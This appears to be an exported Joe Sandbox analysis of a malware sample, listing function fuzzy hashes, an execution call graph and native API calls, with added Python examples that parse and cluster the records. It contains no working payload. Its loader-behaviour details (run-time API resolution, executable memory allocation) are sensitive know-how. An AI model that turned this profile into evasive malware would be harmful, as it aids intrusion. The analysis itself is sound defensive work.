                                                    Similarity
                                                    • API ID:
                                                    • String ID: +
                                                    • API String ID: 0-2126386893
                                                    • Opcode ID: 6b5ce8004efcfc30473b2c1a04f42b6bd18d7a1f7dec8ca369c9538afcba7572
                                                    • Instruction ID: 0cdaf3650671d81b0b7dc7e857c389d9eeada76c74dc11b38abe8c20fe959261
                                                    • Opcode Fuzzy Hash: 6b5ce8004efcfc30473b2c1a04f42b6bd18d7a1f7dec8ca369c9538afcba7572
                                                    • Instruction Fuzzy Hash: 4E4149B1E156188BEB5CCF6B8D4028EFAF7AFC9310F18C1BA845CAA215EF3105568F55
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e46d922331b7b7c03444cfdfbf916c71917ddf4352646880e6cf4aaafb8c6a3e
                                                    • Instruction ID: 2a3faeb2bcd1e5df621f8da0f810c212136c352b17c39f25741bb22cec62bccd
                                                    • Opcode Fuzzy Hash: e46d922331b7b7c03444cfdfbf916c71917ddf4352646880e6cf4aaafb8c6a3e
                                                    • Instruction Fuzzy Hash: 8712A5F04217858AD732CF25E94C1893BA1B741318B97431AD2712F2E9E7B4126FEF86
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ddf816c25a221e2fd3a1a271e266b60ce8c04bc0ce1bf9c1952e9766abecd14
                                                    • Instruction ID: 4d666395a58a05d9eb648c1d1b9739875cc20918c4f627a2ba0b3b2ae7035e75
                                                    • Opcode Fuzzy Hash: 3ddf816c25a221e2fd3a1a271e266b60ce8c04bc0ce1bf9c1952e9766abecd14
                                                    • Instruction Fuzzy Hash: 0DE1F9B4E152198FCB14DFA9C5909AEFBF2FF89304F248169D814AB355D730A942CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88304023805a330e971652f7dda938dc04b3967660484c855f6c2497324aff8f
                                                    • Instruction ID: bbea23b4612a015f2bb002efc7ccaaf294b8f8223596e136e56c173e2a8aae48
                                                    • Opcode Fuzzy Hash: 88304023805a330e971652f7dda938dc04b3967660484c855f6c2497324aff8f
                                                    • Instruction Fuzzy Hash: EFE1EAB4E141198FCB14DFA9C5909AEFBF2FF89304F248169D815AB355D730A982CFA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e13b1d64efc5568df569177e46bc15bce6a136239f2546a0e9d75db53632e8b4
                                                    • Instruction ID: f788b2b2bd8bc4447e7c060f73d3e855cb2528fad4dcb397726f3a57f4fa3c49
                                                    • Opcode Fuzzy Hash: e13b1d64efc5568df569177e46bc15bce6a136239f2546a0e9d75db53632e8b4
                                                    • Instruction Fuzzy Hash: 57E12774E041198FDB14DFA9C5959EEFBB2FF89300F248169E818AB355D770A942CFA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 13a85c2131d8caa967326c2d2f6fc86e84a5ffb3bd0f5da311b3d72c458e7f6f
                                                    • Instruction ID: 650b977ba7bce479efe8076e633170da8e598f9750b7e2558ed3528941de83b7
                                                    • Opcode Fuzzy Hash: 13a85c2131d8caa967326c2d2f6fc86e84a5ffb3bd0f5da311b3d72c458e7f6f
                                                    • Instruction Fuzzy Hash: B5E13874E041198FDB14DFA9C5949AEFBF2FF89304F248169D818AB315C771A982CFA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fd516c52c610d69fea6b445cf7f3c13f487b7cf68ceadb24ce7db567d633e633
                                                    • Instruction ID: c52839b948983fc4ebefee68f2932a4d788ba62574d48d9ca1110adc5b606cce
                                                    • Opcode Fuzzy Hash: fd516c52c610d69fea6b445cf7f3c13f487b7cf68ceadb24ce7db567d633e633
                                                    • Instruction Fuzzy Hash: F3E138B4E041198FDB14DFA9C5959EEFBB2FF89300F248169D809AB355D770A942CFA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 950dd30ed8d9f3879fa0b2438351764742277e736fc84a9a71f91818a9710260
                                                    • Instruction ID: 78875b62604d6a6f6c016e7bb8bb23bc15cc14b4415d5e52d24533ea651f8d00
                                                    • Opcode Fuzzy Hash: 950dd30ed8d9f3879fa0b2438351764742277e736fc84a9a71f91818a9710260
                                                    • Instruction Fuzzy Hash: A7D1F531C20B5A8ACB14EB64D990699B7B1FFD5300F20DB9AE41977210EFB06AC5DF91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4783cba375d796a99a6cfa3b8a3d4b4be12bb1a56e38ce03208ebb5cf3cfaab
                                                    • Instruction ID: 1196e0aa6dbdc3ef7f241c326528ff84aae988a1beaae6da28ac4854d26ffac6
                                                    • Opcode Fuzzy Hash: a4783cba375d796a99a6cfa3b8a3d4b4be12bb1a56e38ce03208ebb5cf3cfaab
                                                    • Instruction Fuzzy Hash: BFA19D32E0021A8FCF09DFB5C84499EB7F2FF88305B15857AE901AB265DB75E915CB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e158dad09cbfe72a98b0524758fff0db33199d803e162a6aaa4ce408c705673
                                                    • Instruction ID: b884d5e2d90c4ead4355f8b8dfa313e1ed475ea62b9b48fc94836ce0fc2ee793
                                                    • Opcode Fuzzy Hash: 0e158dad09cbfe72a98b0524758fff0db33199d803e162a6aaa4ce408c705673
                                                    • Instruction Fuzzy Hash: 25C11BB04217458AD726CF24E8481893BB1BB81324F57431BD1716F2E9EBB4166FEF46
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b7602e0430c8f4a465e96f64655a9875453f769ca75079af897dd0a83b561628
                                                    • Instruction ID: 7be09bee002148853d6941490d0508050bc251d3ee87add778324ec5834f4017
                                                    • Opcode Fuzzy Hash: b7602e0430c8f4a465e96f64655a9875453f769ca75079af897dd0a83b561628
                                                    • Instruction Fuzzy Hash: 4A5185B4D016198BEB68CF6AD94479DFAF3AFC8201F14C1EAD44DA7264DB710A95CF00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b25f14fb1b723f004c77f44ab20101baf58a7ae9b9e5ab38e3d9d324ddbddc0
                                                    • Instruction ID: 9a00ec1cfe2cf5eea1f7c52e5bf42ee3aafdd25d0b4bd653fccb8479eabe7434
                                                    • Opcode Fuzzy Hash: 1b25f14fb1b723f004c77f44ab20101baf58a7ae9b9e5ab38e3d9d324ddbddc0
                                                    • Instruction Fuzzy Hash: 1141C9B1D057598FEB59CF6BC804389BBF3AFC5204F18C0EAC448AB265EB7509858F50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 41081ba81fe93d3a65f3bf5a25e9049be6b21081a4b63426013607d969e7128f
                                                    • Instruction ID: 8d4d8903e67e30152131936d47d2f2460b30feb3e59b3856caef616252f279c9
                                                    • Opcode Fuzzy Hash: 41081ba81fe93d3a65f3bf5a25e9049be6b21081a4b63426013607d969e7128f
                                                    • Instruction Fuzzy Hash: 4C41A871D097688FDB59CF6798143DEBBB6AF86304F08C0EAC44CAA265DB740989CF51
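The records above are one entry per disassembled function: which memory dump it came from (the dump base is the "Offset" on the Source File line), the strings the function references, and two fuzzy hashes computed over its opcodes and its full instructions. The same string `4'sq` turns up in functions from two different dumps (055B0000 and 07250000) whose Instruction Fuzzy Hashes are close to one another, which is how an analyst spots the same code mapped into more than one region. The following is an added example, not Joe Sandbox code, that parses such records and groups near-identical functions across dumps. The similarity metric (per-nibble Hamming agreement over the Instruction Fuzzy Hash) is an assumption chosen for illustration; it is not the algorithm behind the report's own "Similarity" field. The sample records are copied from the table above, with the later three abbreviated.

```python
import re
from dataclasses import dataclass, field
from itertools import combinations

# Constructed sample input: four function records copied from the report above.
# The first record is complete; the other three keep only the lines used here.
SAMPLE_RECORDS = """\
Strings
Memory Dump Source
• Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
Similarity
• API ID:
• String ID: 4'sq
• API String ID: 0-1075809040
• Opcode ID: 7b33ad76f5fe69b001b173529294b369a9992f597a14a408acd4c4bfba9b1b2a
• Instruction ID: 5a4fd6e973f585f4e0d2100079fd6e55ffe42a91bf5597c293863bb92b0f86f8
• Opcode Fuzzy Hash: 7b33ad76f5fe69b001b173529294b369a9992f597a14a408acd4c4bfba9b1b2a
• Instruction Fuzzy Hash: C3611D71E103098FDB48EF7AE85169ABFF3BB89300F14D52AD104AB268DF75584ADB50
Memory Dump Source
• Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
• String ID: 4'sq
• Instruction Fuzzy Hash: EB610D70E107098FDB48EF7AE85169ABFF3BB89300F14D52AD104AB264DF71584ADB51
Memory Dump Source
• Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
• String ID: 4'sq
• Instruction Fuzzy Hash: 63611C70E106098FD748EF6AE890A9ABFF3BB89305F54C52AD004EB264DFB05846DF51
Memory Dump Source
• Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
• String ID: +
• Instruction Fuzzy Hash: 094163B1D156188BEB6CCF6B8C442CEFAF7AFC9310F14C1BA880CAA215EB7105958F45
"""


@dataclass
class FunctionRecord:
    offset: str = ""                       # dump base taken from "Offset: ..." on the Source File line
    fields: dict = field(default_factory=dict)

    @property
    def string_id(self):
        return self.fields.get("String ID", "")

    @property
    def instruction_fuzzy(self):
        return self.fields.get("Instruction Fuzzy Hash", "")


def parse_records(text):
    """Split the plugin export into records; a record starts at 'Memory Dump Source'."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = FunctionRecord()
            records.append(current)
        elif line.startswith("•") and current is not None:
            key, _, value = line.lstrip("• ").partition(":")
            key, value = key.strip(), value.strip()
            current.fields[key] = value
            if key == "Source File":
                m = re.search(r"Offset: ([0-9A-Fa-f]+)", value)
                current.offset = m.group(1) if m else ""
    return records


def hamming(a, b):
    """Nibble-wise Hamming distance; a length difference counts as that many mismatches (assumption)."""
    return sum(x != y for x, y in zip(a, b)) + abs(len(a) - len(b))


def nibble_similarity(a, b):
    n = max(len(a), len(b))
    return 1.0 - hamming(a, b) / n if n else 0.0


def cluster(records, threshold=0.8):
    """Connected components of records whose instruction hashes agree at or above `threshold`."""
    parent = list(range(len(records)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i, j in combinations(range(len(records)), 2):
        if nibble_similarity(records[i].instruction_fuzzy, records[j].instruction_fuzzy) >= threshold:
            parent[find(i)] = find(j)
    groups = {}
    for i, rec in enumerate(records):
        groups.setdefault(find(i), []).append(rec)
    return list(groups.values())


def cross_dump_matches(records, threshold=0.8):
    """Pairs of similar functions that live in different memory dumps: (offset_a, offset_b, similarity)."""
    out = []
    for a, b in combinations(records, 2):
        if a.offset != b.offset:
            s = nibble_similarity(a.instruction_fuzzy, b.instruction_fuzzy)
            if s >= threshold:
                out.append((a.offset, b.offset, round(s, 3)))
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for match in cross_dump_matches(recs, 0.65):
        print("same function in two dumps:", match)
```

The threshold is deliberately a parameter: the two 055B0000 copies agree on roughly nine nibbles in ten, the 07250000 copy on about seven in ten, and the unrelated function on about one in four, so a cut-off in the 0.6 to 0.8 range separates the three copies from the noise on this input.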

                                                    Execution Graph

                                                    Execution Coverage:1.4%
                                                    Dynamic/Decrypted Code Coverage:2.7%
                                                    Signature Coverage:5.8%
                                                    Total number of Nodes:555
                                                    Total number of Limit Nodes:71
execution_graph (node and edge listing of the rendered graph; the export is cut off mid-listing). Each node appears as a numeric id, the function address and any API names resolved in it; edges are written as id->id. What the listing records:
• Entry chain: 41f190 -> 41b970 -> 41b996 -> 409d40 -> 409c90 -> 418bc0 -> 414e50, which loads through 4152d0 (LdrLoadDll). Process exit runs 41b9b5 -> 41a6b0 -> 41a6cf (ExitProcess).
• 41af60 (LdrLoadDll) is the common resolver called ahead of every native API wrapper: 41a37c NtCreateFile, 41a42c NtReadFile, 41a4ac NtClose, 41a55c NtAllocateVirtualMemory, 41a64c RtlAllocateHeap, 41a68c RtlFreeHeap, 41a7ef LookupPrivilegeValueW.
• The wrappers 419e20, 419ec0, 419f00, 41a010, 41a060, 41a260, 41a500 and 41a5c0 each pass through 41af60 and then into stubs outside the image at 1182c1f, 1182c70, 1182d10, 1182d30, 1182df0, 1182e80, 1182ea0 and 1182fb0, all labelled LdrInitializeThunk.
• 41ad70 is a straight-line sequence of some forty calls to 41ac30 (itself a LdrLoadDll wrapper via 41ac4b -> 414e50) between 41ad84 and 41aeec, i.e. bulk import resolution.
• Other API-bearing nodes: 414790 (LdrLoadDll NtReadFile NtClose), 414650 and 40c4c0 (LdrLoadDll NtClose LdrInitializeThunk), 40f5f0 (LdrLoadDll NtClose), 41a490 (LdrLoadDll NtClose), 41bfd0 (LdrLoadDll RtlAllocateHeap), 41cfd0 (LdrLoadDll RtlAllocateHeap RtlFreeHeap), 41cf90 (LdrLoadDll RtlFreeHeap), and LdrLoadDll-only nodes 405f60, 409620, 40ad50, 414e50, 4152d0, 419c90, 419cd0, 419d90, 419dc0, 419e50, 41a2a0, 41a320, 41a460, 41af00.
• Collapsed subgraphs (shown only as a call count): 40f4a0 (3 API calls), 407ea0 (4), 414a50 (8), 40f710 (10), 4083a0 (11), 4087a0 (19), and 41a500, 41a5c0, 41bdc0, 41bf90, 41cf30, 419ec0, 419e20, 419f00, 41a010, 41a490 (2 each).
99317->99315 99319 419d10 LdrLoadDll 99317->99319 99318->99316 99320 4084ff 99319->99320 99320->99315 99399 419d50 99320->99399 99322 408563 99322->99315 99323 414a50 8 API calls 99322->99323 99324 4085b8 99323->99324 99324->99286 99325->99286 99327 41bf90 2 API calls 99326->99327 99328 419897 99327->99328 99354 409310 99328->99354 99330 4198b2 99331 4198f0 99330->99331 99332 4198d9 99330->99332 99335 41bd40 2 API calls 99331->99335 99333 41bdc0 2 API calls 99332->99333 99334 4198e6 99333->99334 99334->99297 99336 41992a 99335->99336 99337 41bd40 2 API calls 99336->99337 99338 419943 99337->99338 99343 419be4 99338->99343 99360 41bd80 99338->99360 99341 419bd0 99342 41bdc0 2 API calls 99341->99342 99344 419bda 99342->99344 99345 41bdc0 2 API calls 99343->99345 99344->99297 99346 419c39 99345->99346 99346->99297 99348 40829f 99347->99348 99349 4081b5 99347->99349 99348->99299 99349->99348 99350 414a50 8 API calls 99349->99350 99351 408222 99350->99351 99352 41bdc0 2 API calls 99351->99352 99353 408249 99351->99353 99352->99353 99353->99299 99355 409335 99354->99355 99356 40acf0 LdrLoadDll 99355->99356 99357 409368 99356->99357 99359 40938d 99357->99359 99363 40cf20 99357->99363 99359->99330 99381 41a580 99360->99381 99364 40cf4c 99363->99364 99365 41a1e0 LdrLoadDll 99364->99365 99366 40cf65 99365->99366 99367 40cf6c 99366->99367 99374 41a220 99366->99374 99367->99359 99371 40cfa7 99372 41a490 2 API calls 99371->99372 99373 40cfca 99372->99373 99373->99359 99375 41a23c 99374->99375 99376 41af60 LdrLoadDll 99374->99376 99380 1182ca0 LdrInitializeThunk 99375->99380 99376->99375 99377 40cf8f 99377->99367 99379 41a810 LdrLoadDll 99377->99379 99379->99371 99380->99377 99382 41af60 LdrLoadDll 99381->99382 99383 41a59c 99382->99383 99386 1182f90 LdrInitializeThunk 99383->99386 99384 419bc9 99384->99341 99384->99343 99386->99384 99388 408328 99387->99388 99389 40acf0 LdrLoadDll 99388->99389 99390 408343 99389->99390 99391 414e50 LdrLoadDll 99390->99391 99392 408353 
99391->99392 99393 40835c PostThreadMessageW 99392->99393 99394 408370 99392->99394 99393->99394 99394->99314 99396 40f683 99395->99396 99402 419e90 99396->99402 99400 41af60 LdrLoadDll 99399->99400 99401 419d6c 99399->99401 99400->99401 99401->99322 99403 419eac 99402->99403 99404 41af60 LdrLoadDll 99402->99404 99407 1182dd0 LdrInitializeThunk 99403->99407 99404->99403 99405 40f6ae 99405->99314 99407->99405 99408->99245 99410 41af60 LdrLoadDll 99409->99410 99411 419fdc 99410->99411 99414 1182f30 LdrInitializeThunk 99411->99414 99412 40f4fe 99412->99251 99412->99252 99414->99412 99415->99257 99416->99262 99417->99267 99419 1182ad0 LdrInitializeThunk

Control-flow Graph (rendered graph omitted; executed/not-executed colouring not recoverable)
• Block 0 41a410-41a426 reaches block 1 41a42c-41a459 (NtReadFile) either directly or through block 2 at 41a427, which calls 41af60 first (edges 0->1, 0->2, 2->1).
                                                    APIs
                                                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: 1JA$rMA$rMA
                                                    • API String ID: 2738559852-782607585
                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Control-flow Graph (rendered graph omitted)
• Single block 3 41a40e-41a459: call 41af60, then NtReadFile.
                                                    APIs
                                                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: 1JA$rMA$rMA
                                                    • API String ID: 2738559852-782607585
                                                    • Opcode ID: 82d684a64c6caecd14d81af05a65232a39f19b95b4c11cc6aeb29fb42846e935
                                                    • Instruction ID: 7b87a2adbf5bb1892d68d0bc153a876819ddc7eeaa9824eb43eaacbcb118f6b4
                                                    • Opcode Fuzzy Hash: 82d684a64c6caecd14d81af05a65232a39f19b95b4c11cc6aeb29fb42846e935
                                                    • Instruction Fuzzy Hash: 66F03AB6200049ABCB04DF98D890CEB77ADFF8C314B15874DFE1C93202C634E8558BA0

Control-flow Graph (rendered graph omitted)
• Block 219 40acf0-40ad19 (call 41cc50) branches to 222 40ad1b-40ad1e or to 223 40ad1f-40ad2d (call 41d070); 223 reaches 226 40ad3d-40ad4e (call 41b4a0) directly or through 227 40ad2f-40ad3a (call 41d2f0); 226 either calls LdrLoadDll in 232 40ad50-40ad64 and falls through to 233 40ad67-40ad6a, or skips straight to 233 (edges 219->222, 219->223, 223->226, 223->227, 227->226, 226->232, 226->233, 232->233).
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                    • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                    • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

Control-flow Graph (rendered graph omitted)
• Single block 234 41a360-41a3b1: call 41af60, then NtCreateFile.
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Control-flow Graph (rendered graph omitted)
• Single block 237 41a540-41a57d: call 41af60, then NtAllocateVirtualMemory.
                                                    APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579 (the logged values are raw stack slots, not named parameters; if the adjacent 00003000,00000040 are the call's AllocationType and Protect arguments, they decode to MEM_COMMIT | MEM_RESERVE and PAGE_EXECUTE_READWRITE, i.e. an RWX allocation)
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Control-flow Graph (rendered graph omitted)
• Single block 256 41a490-41a4b9: call 41af60, then NtClose.
                                                    APIs
                                                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
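The four native-API entries above (NtReadFile, NtCreateFile, NtAllocateVirtualMemory, NtClose) share one shape: a short stub that calls 41af60, the routine the call graph shows invoking LdrLoadDll, and then the Nt* routine. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses those entries from the report text, records which stub wraps which API and whether it goes through 41af60 first, and decodes the NtAllocateVirtualMemory arguments. Assumptions, also marked in the code: the 0x41af60 address is treated as the run-time resolver purely on the strength of the call graph; the MEM_* and PAGE_* values are the documented Windows constants; and reading the adjacent slots 00003000,00000040 as AllocationType and Protect is an inference, because Joe Sandbox logs raw stack slots (return addresses and junk included) rather than named parameters.

```python
"""Parse Joe Sandbox function entries (the 'control_flow_graph' line and the
'APIs' bullet of each entry above) into records and flag what a reviewer looks
for: the native API each stub wraps, whether the stub first calls 0x41af60 (the
routine the call graph shows invoking LdrLoadDll, i.e. run-time API resolution),
and what NtAllocateVirtualMemory was asked for.  Added example, not report code.
"""
import re
from dataclasses import dataclass, field

# Copied from the four native-API entries above (report text, not sample code).
REPORT_EXCERPT = """\
control_flow_graph 0 41a410-41a426 1 41a42c-41a459 NtReadFile 0->1 2 41a427 call 41af60 0->2 2->1
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
control_flow_graph 234 41a360-41a3b1 call 41af60 NtCreateFile
• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
control_flow_graph 237 41a540-41a57d call 41af60 NtAllocateVirtualMemory
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
control_flow_graph 256 41a490-41a4b9 call 41af60 NtClose
• NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
"""

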